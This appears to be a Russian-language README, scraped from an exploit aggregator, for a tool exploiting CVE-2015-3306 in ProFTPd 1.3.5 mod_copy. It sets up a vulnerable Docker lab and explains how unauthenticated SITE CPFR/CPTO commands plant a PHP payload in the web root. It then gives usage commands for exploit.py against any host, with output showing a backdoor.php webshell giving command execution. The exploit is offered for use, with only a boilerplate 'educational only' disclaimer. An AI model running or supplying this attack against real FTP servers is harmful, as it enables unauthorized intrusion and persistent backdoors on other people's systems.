## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-T0KX-EXPLOIT-CVE-2015-3306
# ProFTPd 1.3.5 - (mod_copy) Удаленное выполнение команд
ProFTPD — это высоконастраиваемый FTP-демон для Unix и Unix-подобных операционных систем. ProFTPD возник из желания создать безопасный и настраиваемый FTP-сервер. Он был вдохновлён значительным восхищением веб-сервером Apache. В отличие от большинства других FTP-серверов Unix, он не основан на старом коде BSD `ftpd`, а представляет собой совершенно новую разработку и реализацию.
## Уязвимая среда
Для настройки уязвимой среды для тестирования вам понадобится установленный Docker, и просто выполните следующую команду:
root@kitploit:~
docker build -t vuln/cve-2015-3306 .
docker run --rm -it -p 21:21 -p 80:80 vuln/cve-2015-3306
И это запустит уязвимое приложение на вашем хосте на портах `21` и `80`.
## Уязвимый код
Модуль `mod_copy` в ProFTPD 1.3.5 позволяет удалённым злоумышленникам читать и записывать произвольные файлы с помощью команд site cpfr и site cpto. Любой неаутентифицированный клиент может использовать эти команды для копирования файлов из любой части файловой системы в выбранное место. Команды копирования выполняются с правами службы ProFTPD, которая по умолчанию работает с привилегиями пользователя 'nobody'. Используя `/proc/self/cmdline` для копирования PHP-нагрузки в каталог веб-сайта, становится возможным удалённое выполнение PHP-кода.
## Эксплойт
Чтобы эксплуатировать эту цель, просто выполните:
root@kitploit:~
./exploit.py --host HOST --port PORT --path PATH
Если вы используете этот уязвимый образ, вы можете просто выполнить:
root@kitploit:~
./exploit.py --host 127.0.0.1 --port 21 --path "/var/www/html/"
После эксплуатации в корневой папке веб-каталога будет сохранён файл с именем backdoor.php. И эксплойт предоставит вам оболочку, в которой вы сможете отправлять команды на бэкдор:
root@kitploit:~
./exploit.py --host 127.0.0.1 --port 21 --path "/var/www/html/"
[+] CVE-2015-3306 exploit by t0kx
[+] Exploiting 127.0.0.1:21
[+] Target exploited, acessing shell at http://127.0.0.1/backdoor.php
[+] Running whoami: www-data
[+] Done
## Авторы
Эта уязвимость была найдена Вадимом Мелиховым.
## Отказ от ответственности
Эта и предыдущая программа предназначены ТОЛЬКО для образовательных целей. Не используйте их без разрешения. Применяется обычный отказ от ответственности, особенно тот факт, что я (t0kx) не несу ответственности за любой ущерб, причинённый прямым или косвенным использованием информации или функциональности, предоставленной этими программами. Автор или любой интернет-провайдер НЕ несёт ответственности за содержание или неправильное использование этих программ или любых их производных. Используя эти программы, вы принимаете тот факт, что любой ущерб (потеря данных, сбой системы, компрометация системы и т.д.), вызванный использованием этих программ, не является ответственностью t0kx.